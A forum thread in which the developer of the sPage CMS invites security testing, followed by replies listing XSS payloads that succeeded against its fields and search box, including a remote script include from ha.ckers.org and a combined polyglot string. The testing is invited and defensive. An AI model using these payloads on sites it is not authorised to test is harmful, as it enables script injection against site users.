sPage CMS security tests?

Grayda

It's been out to the public for a while (as a beta), but I'm still doing security tests with it. Before I move my main website to this engine, can someone give it a thorough testing? It's a dead-easy to use CMS. You install it, log in and your page reloads with some "Edit <page>" links next to each section of content. Click that link, type your new content in to the WYSIWYG editor and click Save. The page reloads and your website is updated. Also uses phpGACL for security. This is my first major PHP Project released (despite using PHP for 3-4 years now) and I want to make sure it's good.

You can try out the live version at: http://demo.spage.solidinc.org and download the latest build (beta 2) from http://spage.solidinc.org/index.php?page=downloads&latest=1. Beta 2 comes with an installer so it should be rather easy to install.

I'd like you to fiddle with everything, see if unauthenticated users can get anywhere they're not supposed to, log in as moderators and try and escalate privileges, stuff like that. Obviously no stuff that will break the demo site ;) (the demo site resets on the hour anyway). And if you have time, some comments on what you think of it's ease of use and stuff, but PM or email me with those because it's off-topic :P

• 4 weeks later...

XSS Injection:

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.

Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.

Tested value: <<script>document.vulnerable=true;</script>

Tested value: <style><!--</style><script>document.vulnerable=true;//--></script>

Tested value: &<script>document.vulnerable=true;</script>

Tested value: <BODY ONLOAD=document.vulnerable=true;>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <![CDATA[<!--]]<script>document.vulnerable=true;//--></script>

Tested value: <<script>document.vulnerable=true;</script>

Tested value: <style><!--</style><script>document.vulnerable=true;//--></script>

Tested value: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>

Tested value: <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->

Tested value: ¼script¾document.vulnerable=true;¼/script¾

Tested value: <BODY ONLOAD=document.vulnerable=true;>

• 2 weeks later...

Your search box is vulnerable to XSS for sure. Just cope and paste the following into it and see for yourself.

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

and typing in

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

shows the same thing. The second example above is several attacks combined into one and is a good way of testing if you're in a rush...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.